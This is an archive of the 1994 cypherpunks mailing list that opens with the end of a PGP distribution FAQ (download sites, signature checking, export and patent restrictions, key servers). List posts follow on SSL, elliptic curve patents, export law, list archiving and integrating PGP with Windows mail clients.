ftp.ee.und.ac.za /pub/crypto/pgp ftp.csua.berkeley.edu /pub/cypherpunks/pgp (DOS, MAC) ftp.demon.co.uk /pub/amiga/pgp /pub/archimedes /pub/pgp /pub/mac/MacPGP ftp.informatik.tu-muenchen.de ftp.funet.fi ftp.dsi.unimi.it /pub/security/crypt/PGP ftp.tu-clausthal.de (139.174.2.10) (Atari ST/E,TT,Falcon) /pub/atari/misc/pgp/pgp26uib.lzh (2.6ui ttp, 2.3a docs) /pub/atari/misc/pgp/pgp26uis.lzh (2.6ui sources) /pub/atari/misc/pgp/pgp26ui.diffs (Atari diffs for 2.6 sources) wuarchive.wustl.edu /pub/aminet/util/crypt src.doc.ic.ac.uk (Amiga) /aminet /amiga-boing ftp.informatik.tu-muenchen.de /pub/comp/os/os2/crypt/pgp23os2A.zip (OS/2) iswuarchive.wustl.edu pub/aminet/util/crypt (Amiga) nic.funet.fi (128.214.6.100) /pub/crypt ftp.uni-kl.de (131.246.9.95) /pub/aminet/util/crypt qiclab.scn.rain.com (147.28.0.97) pc.usl.edu (130.70.40.3) leif.thep.lu.se (130.235.92.55) goya.dit.upm.es (138.4.2.2) tupac-amaru.informatik.rwth-aachen.de (137.226.112.31) ftp.etsu.edu (192.43.199.20) princeton.edu (128.112.228.1) pencil.cs.missouri.edu (128.206.100.207) ftp.csua.berkeley.edu kauri.vuw.ac.nz nctuccca.edu.tw /PC/wuarchive/pgp/ ftp.fu-berlin.de:/mac/sys/init/MacPGP2.6uiV1.2en.cpt.hqx.gz Also, try an archie search for PGP using the command: archie -s pgp262 (DOS & Unix Versions) archie -s pgp2.6 (MAC Versions) FTPMAIL For those individuals who do not have access to FTP, but do have access to e-mail, you can get FTP files mailed to you. For information on this service, send a message saying "Help" to ftpmail at decwrl.dec.com. You will be sent an instruction sheet on how to use the ftpmail service. It works with messages something like this: > To: ftpmail at decwrl.dec.com > Subject: Ftpmail request > Connect ftp.csua.berkeley.edu > chdir pub/cypherpunks/pgp/pgp262 > uuencode > get pgp262.zip > quit Another e-mail service is from nic.funet.fi. Send mail to mailserv at nic.funet.fi with the word HELP. 
For the ftp sites on netcom, send mail to ftp-request at netcom.com containing the word HELP in the body of the message. To get pgp 2.6.i by email: Send a message to hypnotech-request at ifi.uio.no with your request in the Subject: field. Subject What you will get GET pgp26i.zip MS-DOS executable (uuencoded) GET pgp26is.zip MS-DOS source code (uuencoded) GET pgp26is.tar.gz UNIX source code (uuencoded) For FAQ information, send e-mail to mail-server at rtfm.mit.edu with send usenet/news.answers/ftp-list/faq in the body of the message. IS MY COPY OF PGP GOOD? If you find a version of the PGP package that does not include the PGP User's Guide, something is wrong. The manual should always be included in the package. PGP should be signed by one of the developers (Philip Zimmermann, Jeff Schiller, Viacrypt, Stale Schumacher, etc.). If it isn't, the package is suspect and should not be used or distributed. The site you found it on should remove it so that it does no further harm to others. To be really sure, you should get PGP directly from MIT or check the signatures with a version of PGP that you trust. The copies of PGP on ftp.csn.net/mpj, ftp.netcom.com/pub/mp/mpj, and the Colorado Catacombs BBS are direct copies of the ones on MIT, except that the ones on the BBS include a BBS advertisement (automatically added by the system when it virus scans new files) in the outer .zip files. OTHER PGP DOCUMENTATION PGP is rather counter-intuitive to a Mac user. Luckily, there's a guide to using MacPGP in ftp://ftp.netcom.com/pub/qw/qwerty/Here.is.How.to.MacPGP. For more information on the "time bomb" in PGP, see ftp://ftp.csn.net/mpj/pgpbomb.asc More PGP details are at http://www.pegasus.esprit.ec.org/people/arne/pgp.html Windows shells documentation http://www.LCS.com/winpgp.html LANGUAGE MODULES These are suitable for most PGP versions. I am not aware of any export/import restrictions on these files. 
German * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_german.txt * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_german.txt * _US:_ ftp://ftp.csn.net/mpj/public/pgp/PGP_german_docs.lha Italian * _IT:_ ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.italian.tar.gz * _FI:_ ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/PGP/pgp-lang.italian.tar.gz * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.italian.tar.gz Japanese * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_japanese.tar.gz * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-msgs-japanese.tar.gz Lithuanian * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_lithuanian.zip * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp23ltk.zip Russian * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_russian.zip * _RU:_ ftp://ftp.kiae.su/unix/crypto/pgp/pgp26ru.zip (MIT version) * _RU:_ ftp://ftp.kiae.su/unix/crypto/pgp/pgp26uir.zip (ui version) * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp26ru.zip Spanish * _IT:_ ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.spanish.tar.gz * _FI:_ ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/pgp-lang.spanish.tar.gz * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.spanish.tar.gz Swedish * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_swedish.txt * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_swedish.txt MAILING LIST FOR PGP AND RELATED TOPICS (PGP MAILING LIST IN GERMAN) The list address: pgp-friends at fiction.pb.owl.de The *request* address (for subscribe/unsubscribe and other administrative matters): pgp-friends-request at fiction.pb.owl.de WHAT IS ALL THIS NONSENSE ABOUT EXPORT CONTROLS? For a detailed rant, get ftp://ftp.csn.net/mpj/cryptusa.zip The practical meaning, until the law is corrected to make sense, is that you are requested to get PGP from sites outside of the USA and Canada if you are outside of the USA and Canada. If you are in France, I understand that you aren't even supposed to import it. Other countries may be worse.
Make sure you follow the laws of your own country. If you want to officially export PGP, you may be able to get permission in limited cases and for a fee. Contact the U. S. Department of State for information. WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN THE USA? MIT PGP is only for personal, noncommercial use because of restrictions on the licensing of both the RSA algorithm (attached to RSAREF) and the IDEA algorithm. PKP/RSADSI insist that we use RSAREF instead of the mpi library for reasons that make sense to them. For commercial use, use Viacrypt PGP, which is fully licensed to use both the RSA and IDEA algorithms in commercial and corporate environments (as well as personal use, of course). Another restriction is due to an exclusive marketing agreement between Philip Zimmermann and Viacrypt that applies to the USA and Canada only. Viacrypt has exclusive rights to market PGP commercially in this area of the world. This means that if you want to market PGP commercially in competition with Viacrypt in the USA or Canada, you would have to create a new implementation of the functions of PGP containing none of Philip Zimmermann's copyrighted code. You are free to modify existing PGP code for your own use, as long as you don't sell it. Phil would also appreciate your checking with him before you distribute any modified versions of PGP as freeware. "PGP", "Pretty Good Privacy" and "Phil's Pretty Good Software" are trademarks owned by Philip Zimmermann. This means that if you modify an older version of PGP that was issued under the copyleft license and distribute it without Phil's permission, you have to call it something else. This avoids confusing all of us and protects Phil's good name. WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN CANADA? MIT PGP is only for noncommercial use because of restrictions on the licensing of the IDEA algorithm.
Because the RSA algorithm isn't patented in Canada, you are free to use the mpi library instead of RSAREF, if you want to, thus freeing yourself of the RSAREF license associated with the RSAREF copyright, which is valid in Canada. For commercial use, use Viacrypt PGP, which is fully licensed to use the IDEA algorithm in commercial and corporate environments. The exclusive marketing agreement with Viacrypt also applies in Canada. See the section on USA intellectual property restrictions for more details. WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST OUTSIDE NORTH AMERICA? MIT PGP is only for noncommercial use in areas where there is a patent on software implementations of the IDEA algorithm. Because the RSA algorithm isn't patented outside of the USA, you are free to use the mpi library instead of RSAREF, if you want to, thus freeing yourself of the RSAREF license restrictions. The RSAREF copyright holds outside of the USA, even though the RSA patent does not. The IDEA conventional block cipher is covered by US Patent 5,214,703 and European patent EP 0 482 154 B1. IDEA is a trademark of Ascom-Tech AG. Commercial users of IDEA (including commercial use of PGP) may obtain licensing details from Ph. Baumann, Ascom Tech Ltd., IDEA Lizenz, Postfach 151, CH-4502 Solothurn, Switzerland, Tel ++41 65 242828, Fax ++41 65 242847. WHAT IS COMMERCIAL USE? Use some common sense. If you are running a business and using PGP to protect credit card numbers sent to you electronically, then you are using PGP commercially. Your customers, however, need not buy the commercial version of PGP just to buy something from you, if that is the only commercial use they make of PGP (since they are spending, not making, money with PGP). If you are just encrypting love letters or other personal mail (for which you don't get paid) on your own personal computer, that is not commercial. If you are encrypting official business mail on your for-profit corporation's computer with PGP, that is commercial use.
Note that there are some gray areas not covered above, and the patent owners of RSA and IDEA may differ from my interpretation in the areas not covered above, so if you are in doubt, you should consider the licensing of Viacrypt PGP (or outside of North America, direct licensing of IDEA) to be cheap legal insurance. Indeed, the license fee is probably a lot cheaper than a legal opinion from a lawyer qualified to make such a judgement. Note that I am not a lawyer and the above is not legal advice. Use it at your own risk. WHAT IS THE "TIME BOMB" IN MIT PGP 2.6? There was a version byte change in MIT PGP 2.6 as of 1 September 1994. See ftp://ftp.csn.net/mpj/pgpbomb.asc for details. ARE MY KEYS COMPATIBLE WITH THE OTHER PGP VERSIONS? If your RSA key modulus length is less than or equal to 1024 bits (I don't recommend less, unless you have a really slow computer and little patience), and if your key was generated in the PKCS format, then it will work with any of the current PGP versions (MIT PGP 2.6, PGP 2.6ui, or Viacrypt PGP 2.7). If this is not the case, you really should generate a new key that qualifies. MIT PGP 2.6.2 should be able to use 2048 bit keys. Generation of 2048 bit keys is supposed to automatically be enabled in PGP 2.6.2 in December, 1994. By then, hopefully, most people will have had a chance to upgrade to a version of PGP that can use them, so longer keys won't be a big problem. On the other hand, 1024 bit keys are probably beyond the reach of most criminals and spies to break, anyway.
MORE WORLD WIDE WEB URLs http://draco.centerline.com:8080/~franl/pgp/pgp-mac-faq-hinely.html http://draco.centerline.com:8080/~franl/pgp/pgp.html http://draco.centerline.com:8080/~franl/crypto/cryptography.html http://www.pegasus.esprit.ec.org/people/arne/pgp.html http://rschp2.anu.edu.au:8080/crypt.html http://ibd.ar.com/PublicKeys.html http://www.ifi.uio.no/~staalesc/PGPversions.html WINDOWS SHELLS Several shells for running PGP with Microsoft Windows are available at the same places PGP can be found. MACPGP KIT The MacPGP kit is a user interface for the Mac version of PGP. See ftp://ftp.netcom.com/pub/qw/qwerty ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGP_icons.sit.hqx ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkit.hqx ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkitSources.sit.hqx BUGS See the documentation that comes with PGP in the latest versions for bugs in the older versions. The latest versions of PGP may not fully wipe all traces of plain text from a file when given the -w option. For more information, see http://www.mit.edu:8001/people/warlord/pgp-faq.html BETSI - BELLCORE'S TRUSTED SOFTWARE INTEGRITY SYSTEM For information on this service, send mail to certify at bellcore.com with the subject help, or check http://info.bellcore.com/BETSI/betsi.html INTEGRATING PGP AND PINE Send blank e-mail to slutsky at lipschitz.sfasu.edu with Subject: mkpgp to get a c-shell script to interface PGP and Pine. Send a second message with Subject: addtomkpgplist if you want updates sent you automatically. HOW DO I PUBLISH MY PGP PUBLIC KEY? There are lots of ways. One way is to use a key server. Send mail to one of these addresses with the single word "help" in the subject line to find out how to use a key server. 
pgp-public-keys at pgp.iastate.edu public-key-server at pgp.ai.mit.edu pgp-public-keys at cs.tamu.edu pgp-public-keys at chao.sw.oz.au pgp-public-keys at jpunix.com pgp-public-keys at dsi.unimi.it pgp-public-keys at kiae.su pgp-public-keys at fbihh.informatik.uni-hamburg.de There is also an experimental public key server at http://ibd.ar.com/PublicKeys.html Another way is to upload it to the PGP public keys area of the Colorado Catacombs BBS (303-772-1062). Another way is to just send it to your correspondents. You could add it to your .plan file so that finger returns your key. You could add it to some of your postings. No matter which way you do it, you should have your key signed by someone who verifies that your key belongs to you, so that you don't have someone else generating a key that has your name on it, but that isn't yours. Here is my public key:
Permission is granted to distribute unmodified copies of this FAQ. To get the latest version of this FAQ, get ftp://ftp.netcom.com/pub/mp/mpj/getpgp.asc or send mail to ftp-request at netcom.com with the line SEND mp/mpj/getpgp.asc in the body of the message, or send blank mail to mpjohnso at nyx.cs.du.edu. There are many other frequently asked questions. Most of them are covered in the documentation that comes with PGP, and the few that aren't are addressed in documents referenced above. ___________________________________________________________ |\ /| | | | | \/ |o| | Michael Paul Johnson Colorado Catacombs BBS 303-772-1062 | | | | / _ | mpj at csn.org aka mpj at netcom.com m.p.johnson at ieee.org | | |||/ /_\ | ftp://ftp.csn.net/mpj/README.MPJ CIS: 71331,2332 | | |||\ ( | ftp://ftp.netcom.com/pub/mp/mpj/README -. --- ----- .... | | ||| \ \_/ |___________________________________________________________| -----BEGIN PGP SIGNATURE----- Version: 2.7 iQCVAgUBLu3WLvX0zg8FAL9FAQEoEQP+JPh4RjUf5TEvEgdTTOlfMQKo8oFThOPU zWbmWjc4Cs4HTtHK1hs0dLagTCr/TPYA08ue87aiyp5gtMadXJNE0cu9313LzRby 5V6PpmWlAdz2kFCVGTP2BFwS9lajmCGOo4YcIUj/HS6ClKXznIYgg2OPCzJxrLqG UfeQ6m1d22Y= =AG35 -----END PGP SIGNATURE----- From xpat at vm1.spcs.umn.edu Tue Dec 13 13:12:29 1994 From: xpat at vm1.spcs.umn.edu (xpat at vm1.spcs.umn.edu) Date: Tue, 13 Dec 94 13:12:29 PST Subject: HyperAccess for Windows 2.0 advertises RSA encryption Message-ID: <9412132111.AA11824@toad.com> Recently received an offer from Hilgraeve, producer of HyperAccess for Windows 2.0.
(800) 826-2760 I quote the brochure "Enjoy easier, safer, more secure file transfers with amazing Hyperprotocol enhancements: Autostart, Smart Crash Recovery, and RSA Encryption" "Exchange files containing sensitive data through public data channels (local phone lines, long distance carriers, cellular, or wireless) with complete confidence, using state-of-the-art RSA encryption." Any comments on what they are up to? This is the same company who sent my friend the previous version of the package and told her fer sure fer sure it had full 3270 emulation, but turned out to be a VT100 session with some keyboard remapping to simulate PFkeys. She had to call them twice for her 60 day guaranteed refund. ----------------------------------------------------------------------------- P M Dierking xpat at vm1.spcs.umn.edu | finger for endless frustration W.A.S.T.E From m5 at vail.tivoli.com Tue Dec 13 13:12:34 1994 From: m5 at vail.tivoli.com (Mike McNally) Date: Tue, 13 Dec 94 13:12:34 PST Subject: BofA+Netscape In-Reply-To: Message-ID: <9412132110.AA11186@vail.tivoli.com> Johnathan Corgan writes: > > Is that the same Microsoft that brought us Edlin??? > > Wasn't edlin based on the Unix ed? No. Or at least, if it was, the edlin implementor had some serious misunderstandings. | GOOD TIME FOR MOVIE - GOING ||| Mike McNally | | TAKE TWA TO CAIRO. ||| Tivoli Systems, Austin, TX: | | (actual fortune cookie) ||| "Like A Little Bit of Semi-Heaven" | From wessorh at ar.com Tue Dec 13 13:18:53 1994 From: wessorh at ar.com (Rick H. 
Wesson) Date: Tue, 13 Dec 94 13:18:53 PST Subject: calling all cpunks on netcom Message-ID: <199412132112.NAA20077@ar.com> > From owner-cypherpunks at toad.com Tue Dec 13 13:04 PST 1994 > Date: Tue, 13 Dec 1994 11:46:14 -0800 > From: srikar at netcom.com (Shrieks) > Message-Id: <199412131946.LAA26053 at netcom20.netcom.com> > To: cypherpunks at toad.com > Subject: calling all cpunks on netcom > Sender: owner-cypherpunks at toad.com > > > Hi all, > > Just floating a trial balloon. Are you tired of the high traffic on > the cypherpunks list and having to wade through a ton of mail every > day? Any of you folks approaching your 5M limit from archiving too > many messages? Well, I am and I don't really want to start paying > for the extra memory. Ever tried to get netcom to do anything for you? > I was wondering if it might be worth petitioning the netcom sysadmins > to start up a local newsgroup (eg. netcom.cpunks) that serves as an > archive for the mailing list. That way one gets to use the abilities > of to keep threads together > and so forth. I'm sure there are enough netcom subscribers to warrant this. I'm working on a system that indexes, marks up, and serves up html versions of E-Mail lists. It's still very alpha stuff. cypherpunks is in the trial part of system I call the Biblotech. All URLs that come through the system are also indexed... It's not tiny stuff: Sybase, Verity search engine, etc. are all involved. Would anyone be against me doing such a thing? Allowing anyone to view the c-punks list via html etc... -Rick From rishab at dxm.ernet.in Tue Dec 13 13:21:33 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Tue, 13 Dec 94 13:21:33 PST Subject: Elliptic crypto is patented Message-ID: Eric asks whether elliptic encryption might not be a solution to the world's patenting woes. Last April, schirado at lab.cc.wmich.edu (Schirado) asked whether anyone was interested in trying an implementation.
I was relatively free of work at that time, and volunteered. Then I got busy; IAC it appeared far too slow for software. Read: _An Implementation of Elliptic Curve Cryptosystems Over F-2-155_ , IEEE Journal on Selected Areas in Communications, Vol. 11, #5, June 1993 (page 804). Incidentally Next Computer's Fast Elliptic Encryption, FEE, used elliptic curves, and is patented (by R E Crandell, USP# 5,159,632, 27 October 1992); also, elliptic crypto is probably covered by the DH/PKP patents. "We know everything about you that we need to know" - Coleta Brueck, IRS ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Tue Dec 13 13:21:35 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Tue, 13 Dec 94 13:21:35 PST Subject: Academic crypto export over e-mail? Message-ID: mpj at csn.org: > be other restrictions that I am not aware of to your using it. The C++ code > fragment above is just intended to illustrate the algorithm being discussed, > and is not a complete application. I understand this document to be > Constitutionally protected publication, and not a munition, but don't blame > me if it explodes or has toxic side effects. Eeek! My skin just peeled off! Seriously, I thought the whole ITAR hassle was that 'code fragments' intended to 'illustrate algorithms' are only exportable on paper? After all, Mike Ingle can't send me his Perl RSA libraries to 'illustrate cryptographic prototyping techniques' even though the libraries don't run on their own.
"We know everything about you that we need to know" - Coleta Brueck, IRS ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Tue Dec 13 13:21:36 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Tue, 13 Dec 94 13:21:36 PST Subject: Transport layer security in a Freeh country Message-ID: It's nice to see some technical discussion for a change. I guess one reason transport layer security seems irrelevant to Cypherpunks is that it isn't secure. Not necessarily from a cryptographic point of view, but in its procedure. For example, the Digital Telephony Bill avoided acting against Internet providers _this_ time. Being provided by the carrier, transport-layer security is susceptible to LEA arm-twisting. It may be so even now despite DT's current form. Such sabotaging of end-to-end security is much tougher, if not impossible, and with end-to-end security, transport security is redundant and possibly a painful overhead. (This is quite apart from the other hassles - proxies need to be changed etc - which only exist with transport security.) As for James Donald's criticism of the IETF for not extending HTML to support end-to-end security, well, MIME already exists. "We know everything about you that we need to know" - Coleta Brueck, IRS ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From perry at imsi.com Tue Dec 13 13:37:04 1994 From: perry at imsi.com (Perry E.
Metzger) Date: Tue, 13 Dec 94 13:37:04 PST Subject: IPSP and Netscape In-Reply-To: <199412131952.LAA02566@netcom10.netcom.com> Message-ID: <9412132136.AA13061@snark.imsi.com> James A. Donald says: > Eric Hughes wrote: > > > ... the claims that SSL is better than anything > > > else out there > > Marc Andreessen writes > > I'm sorry, I don't remember such a claim being made. > > Eric and Perry have repeatedly used this method - > not only attacking a straw man, but lying outright > that their opponent has *explicitly* proclaimed > the straw man. > > I am thoroughly sick of this dishonest debating > tactic. We're sick of you inventing facts, but of course, you'll just claim we've been doing that. .pm From adam at bwh.harvard.edu Tue Dec 13 13:38:59 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Tue, 13 Dec 94 13:38:59 PST Subject: Winsock & PGP Integration In-Reply-To: Message-ID: <199412132137.QAA26168@bwnmr5.bwh.harvard.edu> Seems to me that the UNIX model of building one mail transport instead of 20 is a good one. If you separate out the UA from the transport, you make it easy to fix or update the transport. So I would suggest, rather than hacking at Winsock and hoping to catch the right protocols, build a set of libraries that can be called by programs. smtp.dll, for example, would be a mailer that any mail program could call. nntp.dll would handle news, underneath all the various interfaces. If you want to pretend to be premail, you do it in smtp.dll. The advantage to other programmers is that they no longer have to do the low level stuff that they had to before. It allows programmers to build what's interesting, namely, the interface & gizmos. Make the package do the user interface side of things, and make a separate package to do the network protocols. Makes building, testing, and changing things a lot easier. And while you're at it, store all of your files as text.
:) adam Johnathan Corgan wrote: | On a Un*x machine, premail works by impersonating the mail | transfer agent and intercepting the flow of mail in each | direction, adding encryption, signing, and anonymous remail | services in a rather elegant fashion. As the mail system under | Un*x (indeed, the entire OS) is designed to be a "piped and glued | together" batch of smaller utilities, premail's method works well | and is very 'unix-like'. | | How to achieve the same under Windows with winsock based SLIP or | PPP access? The various mail agents such as Eudora and Chameleon | are integrated packages that do everything from using SMTP and POP | for mail transfer to providing the user agent that reads and | writes mail. There really is no simple way to wedge into the | package and replace or supplement functionality. | | Except one. What all of these agents have in common is that they | interface with the Windows Sockets API to establish TCP streams | that are used in the POP and SMTP protocols. Since these are well | known and standardized protocols, this gives us our toehold. -- "It is seldom that liberty of any kind is lost all at once." -Hume From jrochkin at cs.oberlin.edu Tue Dec 13 13:42:11 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Tue, 13 Dec 94 13:42:11 PST Subject: bashing mcom Message-ID: Can we maybe discuss other things than how Mcom fucked up? They've said specifically that they plan to support IPSP as soon as it is viable to do so. They've said they plan to support whatever MIME encryption thingamajigs exist, as soon as they are standardized. [And don't get mad at them for waiting for it to become standardized when their own protocol isn't. I have talked with someone developing commercial software who spent some serious time writing stuff to handle MIME encryption, only to have the specs change on him significantly.] Now, maybe they are lying about this. But you aren't going to get anything else out of them on this list.
They've come as close as they are going to to admitting they made a mistake with SSL. I believe a good paraphrase of what was said (I didn't keep a copy of the message) was that "however it looks now, SSL made sense at the time, and it's a done thing now." Maybe they are only saying this much to appease the list, but again, that's all you are going to get out of them. It seems like it would be an impossibility economically and public-relations-ly for them to just abandon SSL, and they probably don't want to either. But they've said that they plan on supporting IPSP, MIME encryption stuff, and anything else out there that will do the job. I'm not sure what else you want to drag out of them. Can we maybe stop this flame fest and let the list return to its normal traffic levels? From amanda at intercon.com Tue Dec 13 13:46:08 1994 From: amanda at intercon.com (Amanda Walker) Date: Tue, 13 Dec 94 13:46:08 PST Subject: Authentication vs encryption: CPs on the web Message-ID: <9412131646.AA13156@amanda.dial.intercon.com> > I notice that the people who come to this topic from an > institutional point of view tend to be more interested in > the authentication aspects. > This seems to fit better into the control-oriented mindset. > With authentication you can track what people are doing > better; non-repudiable signatures could actually work in some ways > against the signer. I think that may be one reason Phil Zimmermann > is famous for not signing his messages. :-) But encryption can > actually work against institutional interests (compared to individual > ones) by making it harder to keep track of people's activities. Very much agreed. This is why, in my description of the rough criteria I sent out, I included mention of self-signed certificates (which only show that you do in fact have the private key corresponding to a given public key), bare keys, and so on. There clearly need to be facilities for encrypted anonymous use.
To expand on my example of wanting sales literature to be signed so I know it's genuine, I correspondingly *don't* want to include a certificate with identifying information in my own query--I get enough junk mail already, and I don't want vendors to be able to capture market research at the browsing level (I haven't looked at WIRED's server for precisely this reason). Amanda Walker InterCon Systems Corporation From jcorgan at netcom.com Tue Dec 13 13:49:49 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Tue, 13 Dec 94 13:49:49 PST Subject: Winsock & PGP Integration Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > Except one. What all of these agents have in common is that they > interface with the Windows Sockets API to establish TCP streams > that are used in the POP and SMTP protocols. Since these are well > known and standardized protocols, this gives us our toehold. > >How might an interposed winsock DLL recognize what high level protocol >it was going to spoof? Getting the port number will be a very good >approximation, but I'm not convinced of its reliability. Well, it could be done "by definition." Let's say I tell my Eudora that the SMTP and POP address to use is 192.0.0.1. I can now configure my spoofing agent that when there is an attempt to establish a TCP stream on port 110 of 192.0.0.1, I can be assured that it is the mailer trying to retrieve mail. Likewise for mail delivery (and news, spoofing NNTP, though this is probably an order of magnitude more complicated than just mail.) >As to the general issue of MSWindows v. Unix, the Unix predominance >for remailer software involves the fact that Unix is on the bulk of >the machines connected to the Internet. It's more reliable for >offering network services than MSWindows and it's got a cleaner >architecture for reconfiguration. None of these explanations, >however, means that there won't be more MSWindows than Unix boxes for >a long time. Of course.
Unix was around long before DOS/Windows gained market dominance of the personal computing market. And for automated encryption on that platform, premail seems to do a great job (though there are some features I'd like to see added, Raph). The unfortunate thing I think is that Unix/X-Windows has never gained a foothold in the "consumer" market. - From a marketing perspective, if we are trying to "sell" strong crypto use to the "masses", then it is only prudent to assess where these types of products would be deployed. And the two platforms that will entirely make up the personal computing market will be DOS/Windows95 and to a lesser extent, OS/2 Warp. This was a subject brought up at the last Cypherpunks meeting (by Tim, I think.) For fifteen years we have had some pretty sophisticated theoretical models of strong cryptographic techniques. Some of these, such as PK encryption, have reached the "masses" in the form of PGP. Others, such as digital cash, have been mired in implementation issues. It is frustrating to read about and listen to lectures on advanced cryptographic subjects (such as all the great presentations at the last meeting), knowing that it may be years before this "theory" makes it into "practice." I will be happy when cryptography is as ubiquitous on a PC as screen savers. 
======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu3ksU1Diok8GKihAQFyXwQApqXdcRfM7cV2EeRbrB6xMDXwJwWSFl5i 3gwTwDkZ8omK/9N+R9gLx4V6CcpPo7kku+GfUy7dkj4wDYtLTZ7m2sZ+mvg0FJNS 3LUSOKC911LpGj9m7uUcFKF+OsthO7WDz5Xtk5AMUTK26Uo0W4lOxBgOTrdiCdDx q3rYla9+ueU= =TL0Z -----END PGP SIGNATURE----- From tcmay at netcom.com Tue Dec 13 13:50:41 1994 From: tcmay at netcom.com (Timothy C. May) Date: Tue, 13 Dec 94 13:50:41 PST Subject: calling all cpunks on netcom In-Reply-To: <199412131946.LAA26053@netcom20.netcom.com> Message-ID: <199412132147.NAA13766@netcom12.netcom.com> Shrieks wrote: > Just floating a trial balloon. Are you tired of the high traffic on > the cypherpunks list and having to wade through a ton of mail every > day? Any of you folks approaching your 5M limit from archiving too > many messages? Well, I am and I don't really want to start paying > for the extra memory. I ruthlessly cut out messages I don't want to keep, but still have accumulated about 60-100 MB of Cypherpunks mail that I wish to keep (not as mail qua mail, but as articles, essays, comments on crypto points, forwarded items, etc.. Obviously I have this stuff on my home machine. My point? Netcom's "5 MB" limit is useless for actually archiving articles, as it probably should be. At some point one has to download the accumulated stuff. A 5 MB buffer is better than a 1 MB buffer, but not in the steady state solution. Conclusion: The remote vs. local storage problem has to be resolved in any case, so why not solve it sooner rather than later? 
> I was wondering if it might be worth petitioning the netcom sysadmins > to start up a local newsgroup (eg. netcom.cpunks) that serves as an > archive for the mailing list. That way one gets to use the abilities > of to keep threads together > and so forth. I'm sure there are enough netcom subscribers to warrant this. Netcom expires _all_ newsgroups, even its own ("netcom.*" local discussion groups), in the "normal" period of 2-3 weeks. There is no reason to expect them to make an exception for our group. If this is not made an exception, then a 3-week hang around period will hardly constitute an "archive." (Yes, it will reduce _some_ storage, by a shared pool, but only temporarily.) Netcom might be persuaded to create a persistent storage for a discussion group like ours, but I know of no precedents (at Netcom). They would want to be paid somehow for the space used, and arguments that users would not have to pay extra for the above-5MB storage would not be very persuasive to them. (Unlike MIT, for example, Netcom has little incentive in this area.) Convincing them to create another class of service or pricing would be tough, I think. I have no objection to the idea of this, and the general idea of converting the list into a newsgroup (alt.cypherpunks, or soc.cypherpunks, or even rec.flame.cypherpunks) comes up. I just don't think the argument that it saves disk space is very persuasive. At some point the stuff one wants to keep needs to be on one's own machine, right? (There may be some list members who lack a computer, and are accessing solely via terminals. Can't do much for them.) > Just a thought. Pheedback? --Tim May, in his third year of using Netcom with the Cypherpunks list. -- .......................................................................... Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From amanda at intercon.com Tue Dec 13 13:56:43 1994 From: amanda at intercon.com (Amanda Walker) Date: Tue, 13 Dec 94 13:56:43 PST Subject: Clarification of my remarks about Netscape Message-ID: <9412131653.AA45063@amanda.dial.intercon.com> > I didn't bother imbedding the RSA Unaffiliated User CA because I > didn't think server operators would use it to get certificates. Well, it's what Apple is using for PowerTalk signers (which are a key pair and X.509 certificates, by default from the Unaffiliated User PCA). It makes sense for personal (as opposed to organizational) servers, such as someone running MacHTTP for their home page... On the other hand, if RSA has set up a server PCA, that should be sufficient for now. I wonder what the certification policy is, though--how do you prove that you control a given server? For an Unaffiliated User CA certificate, you just have to show a notarized application and two forms of ID, one with a photo (driver's license, passport, etc.). I can't off hand think of 